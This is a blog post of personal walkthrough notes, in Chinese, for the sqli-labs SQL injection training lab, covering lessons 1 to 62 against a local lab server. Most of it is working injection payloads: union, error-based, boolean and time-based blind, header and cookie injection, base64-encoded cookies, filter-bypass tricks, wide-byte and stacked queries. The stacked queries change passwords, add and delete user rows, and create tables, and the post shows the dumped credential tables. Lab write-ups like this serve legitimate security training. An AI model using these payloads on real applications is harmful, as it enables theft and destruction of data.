Loading

sqlilabs

sqlilabs 試

數字，字符型注入

http://127.0.0.1/sqlilabs/Less-1/?id=3'                        報錯
http://127.0.0.1/sqlilabs/Less-1/?id=3' --+                      加入注釋不報錯
http://127.0.0.1/sqlilabs/Less-1/?id=3' order by 3 --+             測試字段3
http://127.0.0.1/sqlilabs/Less-1/?id=33333' union select 1,2,3 --+ 前面修改錯誤數字看回顯

http://127.0.0.1/sqlilabs/Less-2/?id=3
http://127.0.0.1/sqlilabs/Less-2/?id=3 order by 3 --+
http://127.0.0.1/sqlilabs/Less-2/?id=33333 union select 1,2,3 --+

http://127.0.0.1/sqlilabs/Less-3/?id=3" order by 10000 --+     顯示正常，換閉合
http://127.0.0.1/sqlilabs/Less-3/?id=3' order by 10000 --+     錯誤
http://127.0.0.1/sqlilabs/Less-3/?id=3') order by 10000 --+    錯誤信息在10000，
http://127.0.0.1/sqlilabs/Less-3/?id=3') order by 3 --+        閉合是‘）
http://127.0.0.1/sqlilabs/Less-3/?id=33333') union select 1,2,3 --+

http://127.0.0.1/sqlilabs/Less-4/?id=3' order by 100 --+ 顯示正常，換閉合
http://127.0.0.1/sqlilabs/Less-4/?id=3") order by 100 --+ 錯誤信息在100
http://127.0.0.1/sqlilabs/Less-4/?id=3") order by 3 --+
http://127.0.0.1/sqlilabs/Less-4/?id=322222") union select 1,2,3 --+

報錯注入

updatexml函數

mysql5.1.5以上才行
發返回的數據限制為32位，可以使用substr，limit
updatexml（XML_document, XPath_string, new_value）

extractvalue函數

mysql 5.1.5以上
返回32位限制，使用substr，limit
extractvalue（XML_document, XPath_string）

http://127.0.0.1/sqlilabs/Less-5?id=3
http://127.0.0.1/sqlilabs/Less-5?id=3333333  返回只有對或不對，報錯或盲注
報錯
http://127.0.0.1/sqlilabs/Less-5?id=3333333' and updatexml(1,concat(0x7e,database(),0x7e),1) --+
使用limit
http://127.0.0.1/sqlilabs/Less-5?id=3333333' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 3,1),0x7e),1) --+ 
使用substr
http://127.0.0.1/sqlilabs/Less-5?id=3333333' and updatexml(1,concat(0x5e,(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1)),0x5e),1) --+
列
http://127.0.0.1/sqlilabs/Less-5?id=3333333' and updatexml(1,concat(0x5e,(substr((select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema=database()),1)),0x5e),1) --+
字段，改變substr截取的值
http://127.0.0.1/sqlilabs/Less-5?id=3333333' and updatexml(1,concat(0x5e,(substr((select group_concat(username,0x7e,password) from users),31)),0x5e),1) --+

http://127.0.0.1/sqlilabs/Less-6?id=3" order by 1000--+
報錯
http://127.0.0.1/sqlilabs/Less-6?id=3" and updatexml(1,concat(0x7e,database(),0x7e),1)--+
http://127.0.0.1/sqlilabs/Less-6?id=3" and updatexml(1,concat(0x7e,(substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),1)),0x7e),1)--+

文件寫入

? secure-file-priv參數用來限制LOAD DATA, SELECT … OUTFILE, and LOAD_FILE()傳到哪個指定目錄的

值為null時，限制不允許導入導出
值為/tmp/時，限制只能導入導出在/tmp/目錄下
沒有具體值時，不對導入導出做限制
show global variables like '%secure%'；，，，可以在mysql中查看值

http://127.0.0.1/sqlilabs/Less-7?id=3')) order by 3 --+

布爾盲注

http://127.0.0.1/sqlilabs/less-8?id=3' order by 3 --+
盲注
http://192.168.17.128:83/Less-8/?id=3' and length(database())>7 --+  # 判斷數據庫名長度8位
http://192.168.17.128:83/Less-8/?id=3' and (ascii(substr((database()),1,1)))=115 --+ #第一位是s
http://192.168.17.128:83/Less-8/?id=3' and (ascii(substr((database()),2,1)))=101 --+ #第二位是e，類推
http://192.168.17.128:83/Less-8/?id=3' and  (length((select table_name from information_schema.tables where table_schema='security' limit 0,1)))>5 --+ 判斷第一個表的長度6
http://192.168.17.128:83/Less-8/?id=3' and  (length((select table_name from information_schema.tables where table_schema='security' limit 1,1)))>7 --+ 第二個表的長度8
http://192.168.17.128:83/Less-8/?id=3' and (ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 3,1),1,1)))=117 --+第四個表第一位u，類推

時間盲注

if（expr1,expr2,expr3）,如果1正確返回的值為2，否則返回的值為3

(length((database())))>5

(ascii(substr((database()),1,1)))=110

http://192.168.17.128:83/Less-9/?id=3333333
無論對錯頁面不變
http://192.168.17.128:83/Less-9/?id=3' and if((length(database())>7),1,sleep(5)) --+  ,正確時執行時間

http://192.168.17.128:83/Less-9/?id=3' and if((length(database())>8),1,sleep(5)) --+  錯誤時請求時間變得很長

http://192.168.17.128:83/Less-9/?id=3' and if(((ascii(substr((select database()),1,1)))=115),sleep(5),1) --+ 測試第一個字符
http://192.168.17.128:83/Less-9/?id=3' and if(((ascii(substr((select database()),2,1)))=101),sleep(5),1) --+ 第二個字符
http://192.168.17.128:83/Less-9/?id=3' and if(((length((select table_name from information_schema.tables where table_schema='security' limit 0,1)))>5),sleep(5),1) --+ 測試第一個表的長度
http://192.168.17.128:83/Less-9/?id=3' and if(((length((select table_name from information_schema.tables where table_schema='security' limit 1,1)))>7),sleep(5),1) --+ 測試第二個表的長度

http://192.168.17.128:83/Less-10/?id=3" and if((length((database()))>1),sleep(5),1) --+ 使用長度大于1，測試閉合
http://192.168.17.128:83/Less-10/?id=3" and if((ascii((substr((database()),1,1)))=115),sleep(5),1) --+
#  數據庫第一個字符

post

uname=444444441' order by 2 #&passwd=admin&submit=Submit 測試閉合
uname=444444441' union select 1,database() #&passwd=admin&submit=Submit

uname=admin' &passwd=admin&submit=Submit
uname=admin' #&passwd=admin&submit=Submit
uname=admin" #&passwd=admin&submit=Submit
uname=admin") #&passwd=admin&submit=Submit
uname=admin") order by 2 #&passwd=admin&submit=Submit
uname=adaaamin") union select 1,2 #&passwd=admin&submit=Submit

post無回顯

uname=admin\&passwd=admin&submit=Submit  反斜線判斷閉合
uname=admin') order by 2 #&passwd=admin&submit=Submit
uname=admin')  and updatexml(1,concat(0x7e,database(),0x7e),1) #&passwd=admin&submit=Submit 報錯注入

uname=admin\&passwd=admin&submit=Submit  反斜線看閉合
uname=admin" and updatexml(1,concat(0x7e,database(),0x7e),1) #&passwd=admin&submit=Submit

post盲注

uname=admin'&passwd=admin&submit=Submit   只有yes or no，
uname=admin' and length(database())>7 #&passwd=admin&submit=Submit  布爾盲注
uname=admin' and if((length(database())>7),1,sleep(5)) #&passwd=admin&submit=Submit 時間盲注

uname=admin/&passwd=admin&submit=Submit  無回現
uname=admin' and length(database())>1 #&passwd=admin&submit=Submit 測閉合
uname=admin" and length(database())>1 #&passwd=admin&submit=Submit
uname=admin") and length(database())>1 #&passwd=admin&submit=Submit 布爾
uname=admin") and if((length(database())>1),1,sleep(5)) #&passwd=admin&submit=Submit 時間盲注

update

uname=admin&passwd=admin\&submit=Submit    #password參數添加反斜線，有報錯，報錯注入
uname=admin&passwd=admin' and updatexml(1,concat(0x7e,database(),0x7e),1) #&submit=Submit

頭部注入

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36  #顯示頭部信息
User-Agent: 666' and updatexml(1,concat(0x7e,database(),0x7e),1) or '1'='1 報錯注入

Referer: http://192.168.17.128:83/Less-19/   顯示referer字段
Referer: ' and updatexml(1,concat(0x7e,database(),0x7e),1) or '1'='1 報錯注入

Cookie: uname=admin'   添加單引號，顯示報錯信息
Cookie: uname=admin' and updatexml(1,concat(0x7e,database(),0x7e),1) or '1'='1   報錯注入
Cookie: uname=admin' order by 4 # 聯合注入測字段
Cookie: uname=' union select 1,2,database() or '1'='1 #  回顯在2上
Cookie: uname=' union select 1,database(),8 or '1'='1 #  c

base64

Cookie: uname=YWRtaW4%3D   對cookie使用了base64加密
Cookie: uname=YWRtaW4n 加單引號報錯看閉合
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''admin'') LIMIT 0,1' at line 1
admin') and updatexml(1,concat(0x7e,database(),0x7e),1) or ('1')=('1
Cookie: uname=YWRtaW4nKSBhbmQgdXBkYXRleG1sKDEsY29uY2F0KDB4N2UsZGF0YWJhc2UoKSwweDdlKSwxKSBvciAoJzEnKT0oJzE= 
                                                                  報錯注入

Cookie: uname=YWRtaW4i  測試閉合
Cookie: uname=YWRtaW4iIGFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHg3ZSxkYXRhYmFzZSgpLDB4ZSksMSkgb3IgIjEiPSIx 報錯注入

過濾注釋

http://192.168.17.128:83/Less-23/?id=3\ 測試閉合，反斜線
http://192.168.17.128:83/Less-23/?id=2' and '1'='2  有報錯信息
http://192.168.17.128:83/Less-23/?id=2'  and updatexml(1,concat(0x7e,database(),0x7e),1) or '1'='1 報錯
http://192.168.17.128:83/Less-23/?id=333' union select 1,2,3 or '1'='1  聯合注入
http://192.168.17.128:83/Less-23/?id=333' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3 or '1'='1

二次注入

注冊新用戶

登錄注冊的新用戶后，修改密碼，程序對注冊的用戶名有轉義，但是存在數據庫中，取出時沒有任何過濾

密碼修改成功

使用admin登錄，用修改admin' or '12'='12賬號的密碼，成功登錄

繞過

過濾and，or可以使用邏輯運算符&&，||，空格可以考慮url編碼或者不使用空格換括號，注釋符結尾同樣閉合

%09 TAB鍵（水平）
%0a 新建一行
%0c 新的一頁
%0d return功能
%0b TAB鍵（垂直）
%a0 空格

http://192.168.17.128:83/Less-25/?id=33333' union select 1,2,3 --+
http://192.168.17.128:83/Less-25/?id=33333' union select 1,2,database() --+
A
http://192.168.17.128:83/Less-25a/?id=3 oorrder by 3 #  過濾or.and雙寫繞過過
http://192.168.17.128:83/Less-25a/?id=32222 union select 1,2,3 #
http://192.168.17.128:83/Less-25a/?id=32222 union select 1,database(),3 #

http://192.168.17.128:83/Less-26?id=3' anandd(updatexml(1,concat(0x7e,database(),0x7e),1)) oorr '1'='1過濾空格，注釋等，使用括號繞過
http://192.168.17.128:83/Less-26?id=3' anandd%0Bupdatexml(1,concat(0x7e,database(),0x7e),1) || '1'='1
http://192.168.17.128:83/Less-26?id=3' anandd%a0updatexml(1,concat(0x7e,database(),0x7e),1) || '1'='1
A
http://192.168.17.128:83/Less-26a/?id=3')%a0union%a0select%a01,2,3%a0|| ('1
http://192.168.17.128:83/Less-26a/?id=33333')%a0union%a0select%a01,2,3%a0|| ('1

http://192.168.17.128:83/Less-27?id=3333'%a0uNion%a0sElect%a01,2,3%a0|| '1  聯合注入，大小寫繞過
http://192.168.17.128:83/Less-27?id=3'%a0and%a0updatexml(1,concat(0x7e,database(),0x7e),1)%a0||%a0'1
A
http://192.168.17.128:83/Less-27a?id=3333"%a0uNion%a0sElect%a01,2,3%a0||"1

http://192.168.17.128:83/Less-28?id=333333')%a0Union%a0Select%a01,2,3%a0|| ('1
A
http://192.168.17.128:83/Less-28a?id=33333')%a0Union%a0Select%a01,2,3%a0||('1

參數污染HPP

給參數賦多個值

http://192.168.17.128:83/Less-29?id=3&id=33333' union select 1,2,3 --+
http://192.168.17.128:83/Less-29?id=3&id=33333' union select 1,2,database() --+

http://192.168.17.128:83/Less-30?id=3&id=66662" union select 1,2,3 --+

http://192.168.17.128:83/Less-31?id=3&id=2222") union select 1,2,3 --+

寬字節

GBK編碼的時候，會認為兩個字符是一個漢字（前一個ascii碼大于128，才會被認為是漢字），

過濾單引號的思路是將單引號轉義，前面使用反斜線，

\'的ascii是%5c%27，在%5c%27之前加%dd(ascii>128的),形成%dd%5c%27,%dd%5c就是一個漢字，%27作為一個單獨的符號

才能進行寬字節注入

http://192.168.17.128:83/Less-32?id=-3%dd%27 union select 1,2,3--+

http://192.168.17.128:83/Less-33?id=-3%dd%27 union select 1,2,3 --+

uname=admain%dd%27 union select 1,2--+&passwd=admin&submit=Submit

uname=admain%dd%27 and updatexml(1,concat(0x7e,database(),0x7e),1) --+&passwd=admin&submit=Submit 報錯注入

$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";  查詢語句數字型
http://192.168.17.128:83/Less-35?id=3333 union select 1,2,3 --+ 直接注

http://192.168.17.128:83/Less-36?id=3333%DD%27 union select 1,2,3 --+

uname=admin%dd%27 union select 1,2--+&passwd=admin&submit=Submit

堆疊注入

多個語句使用分號隔開，同時執行，后面的句子不需要閉合,
mysqli_multi_query（）類似的函數，同時執行多條語句

Oracle不能使用堆疊注入

http://192.168.17.128:83/Less-38?id=2';update users set password='123456' where username='Angelina';--+
查詢的同時修改密碼

http://192.168.17.128:83/Less-39?id=3;insert users values(22,'666','333');--+
數字型不用閉合添加個用戶

http://192.168.17.128:83/Less-40?id=3') --+   換了閉合
http://192.168.17.128:83/Less-40/?id=3');insert users values(25,'777','777');--+新加用戶

http://192.168.17.128:83/Less-41?id=3;update users set password='000' where username='666'; --+

# 登錄時進行堆疊注入
login_user=admin&login_password=admin';insert users values(16,'666','666');&mysubmit=Login

mysql> select * from users;
+----+----------+------------+
| id | username | password   |
+----+----------+------------+
|  1 | Dumb     | Dumb       |
|  2 | Angelina | I-kill-you |
|  3 | Dummy    | p@ssword   |
|  4 | secure   | crappy     |
|  5 | stupid   | stupidity  |
|  6 | superman | genious    |
|  7 | batman   | mob!le     |
|  8 | admin    | admin      |
|  9 | admin1   | admin1     |
| 10 | admin2   | admin2     |
| 11 | admin3   | admin3     |
| 12 | dhakkan  | dumbo      |
| 14 | admin4   | admin4     |
| 22 | 666      | 666        |
| 16 | 666      | 666        |
+----+----------+------------+

 需要使用閉合
 $sql = "SELECT * FROM users WHERE username=('$username') and password=('$password')";
 
 login_user=admin&login_password=admin');delete from users where id=22;&mysubmit=Login
 mysql> select * from users;
+----+----------+------------+
| id | username | password   |
+----+----------+------------+
|  1 | Dumb     | Dumb       |
|  2 | Angelina | I-kill-you |
|  3 | Dummy    | p@ssword   |
|  4 | secure   | crappy     |
|  5 | stupid   | stupidity  |
|  6 | superman | genious    |
|  7 | batman   | mob!le     |
|  8 | admin    | admin      |
|  9 | admin1   | admin1     |
| 10 | admin2   | admin2     |
| 11 | admin3   | admin3     |
| 12 | dhakkan  | dumbo      |
| 14 | admin4   | admin4     |
+----+----------+------------+
13 rows in set (0.00 sec)

login_user=admin&login_password=admin';insert users values(16,'666','666');&mysubmit=Login

mysql> select * from users;
+----+----------+------------+
| id | username | password   |
+----+----------+------------+
|  1 | Dumb     | Dumb       |
|  2 | Angelina | I-kill-you |
|  3 | Dummy    | p@ssword   |
|  4 | secure   | crappy     |
|  5 | stupid   | stupidity  |
|  6 | superman | genious    |
|  7 | batman   | mob!le     |
|  8 | admin    | admin      |
|  9 | admin1   | admin1     |
| 10 | admin2   | admin2     |
| 11 | admin3   | admin3     |
| 12 | dhakkan  | dumbo      |
| 14 | admin4   | admin4     |
| 16 | 666      | 666        |
+----+----------+------------+
14 rows in set (0.00 sec)

login_user=admin&login_password=admin');delete from users where id=16;&mysubmit=Login

mysql> select * from users;
+----+----------+------------+
| id | username | password   |
+----+----------+------------+
|  1 | Dumb     | Dumb       |
|  2 | Angelina | I-kill-you |
|  3 | Dummy    | p@ssword   |
|  4 | secure   | crappy     |
|  5 | stupid   | stupidity  |
|  6 | superman | genious    |
|  7 | batman   | mob!le     |
|  8 | admin    | admin      |
|  9 | admin1   | admin1     |
| 10 | admin2   | admin2     |
| 11 | admin3   | admin3     |
| 12 | dhakkan  | dumbo      |
| 14 | admin4   | admin4     |
+----+----------+------------+
13 rows in set (0.00 sec)

order by 注入

對查詢數據進行排序的方法，order by 后面可以寫數字或者列名

$sql = "SELECT * FROM users ORDER BY $id";

報錯注入
盲注

升序降序返回的結果不同，可以注入
降序
http://192.168.17.128:83/Less-46/?sort=1 desc
升序
http://192.168.17.128:83/Less-46/?sort=1 asc
報錯輸入
http://192.168.17.128:83/Less-46/?sort=(updatexml(1,concat(0x7e,database(),0x7e),1))#

使用閉合
$sql = "SELECT * FROM users ORDER BY '$id'";
http://192.168.17.128:83/Less-47?sort=1' and (updatexml(1,concat(0x7e,database(),0x7e),1))--+

沒有報錯無法使用報錯注入
http://192.168.17.128:83/Less-48?sort=1'
盲注
http://192.168.17.128:83/Less-48?sort=if(ascii(substr(database(),1,1))=115,0,sleep(5))

盲注
http://192.168.17.128:83/Less-49?sort=1' and if(ascii(substr(database(),1,1))=115,0,sleep(5))--+

order by 堆疊

mysqli_multi_query（），可以執行多條語句
mysql_query（）只能執行一條語句，

http://127.0.0.1/sqlilabs/Less-50?sort=1;create table less50 like users;

mysql> show tables;
+--------------------+
| Tables_in_security |
+--------------------+
| emails             |
| less50             |
| referers           |
| uagents            |
| users              |
+--------------------+
5 rows in set (0.00 sec)

http://127.0.0.1/sqlilabs/Less-51?sort=1';create table less51 like users;--+

mysql> show tables;
+--------------------+
| Tables_in_security |
+--------------------+
| emails             |
| less50             |
| less51             |
| referers           |
| uagents            |
| users              |
+--------------------+
6 rows in set (0.00 sec)

沒有報錯
http://127.0.0.1/sqlilabs/Less-52?sort=1'
使用盲注
http://127.0.0.1/sqlilabs/Less-52?sort=1 and if(ascii(substr(database(),1,1))=115,1,sleep(5))--+

http://127.0.0.1/sqlilabs/Less-53?sort=1';create table less53 like users;--+

mysql> show tables;
+--------------------+
| Tables_in_security |
+--------------------+
| emails             |
| less50             |
| less51             |
| less53             |
| referers           |
| uagents            |
| users              |
+--------------------+
7 rows in set (0.00 sec)

進階

http://192.168.17.128:83/Less-54?id=111111' --+
http://192.168.17.128:83/Less-54?id=1' union select 1,2,3--+
http://192.168.17.128:83/Less-54?id=1' union select 1,2,database()--+
http://192.168.17.128:83/Less-54?id=111111' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+
http://192.168.17.128:83/Less-54?id=111111' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='3LIY4RKB9N' --+
http://192.168.17.128:83/Less-54?id=111111' union select 1,2,group_concat(secret_O59N) from  challenges.3LIY4RKB9N 	 --+

http://192.168.17.128:83/Less-55?id=1111111) union select 1,2,3 --+
http://192.168.17.128:83/Less-55?id=1111111) union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges' --+
http://192.168.17.128:83/Less-55?id=1111111) union select 1,2,group_concat(secret_9Y0E) from challenges.A0GYQNN3KJ--+

http://192.168.17.128:83/Less-56?id=11111') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges' --+
http://192.168.17.128:83/Less-56?id=11111') union select 1,2,group_concat(secret_9Y0E) from challenges.A0GYQNN3KJ --+

```
# 同上雙引號閉合
```

報錯注入
http://192.168.17.128:83/Less-58?id=333333333' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e)) --+
http://192.168.17.128:83/Less-58?id=333333333' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='5XXQF1EV6B'),0x7e)) --+
http://192.168.17.128:83/Less-58?id=333333333' and extractvalue(1,concat(0x7e,(select group_concat(secret_D1A5) from challenges.5XXQF1EV6B),0x7e)) --+

```
# 數字型
```

# 換閉合
$id = '("'.$id.'")';
$sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";

# 換閉合
$sql="SELECT * FROM security.users WHERE id=(('$id')) LIMIT 0,1";

延遲注入
http://192.168.17.128:83/Less-62?id=1') and if((ascii((substr((select database()),1,1)))=99),0,sleep(5))--+

$sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";

$sql="SELECT * FROM security.users WHERE id=(($id)) LIMIT 0,1";

$sql="SELECT * FROM security.users WHERE id=($id) LIMIT 0,1";

posted @ 2022-03-25 22:35 5rem 閱讀(93) 評論(0) 收藏舉報

刷新頁面返回頂部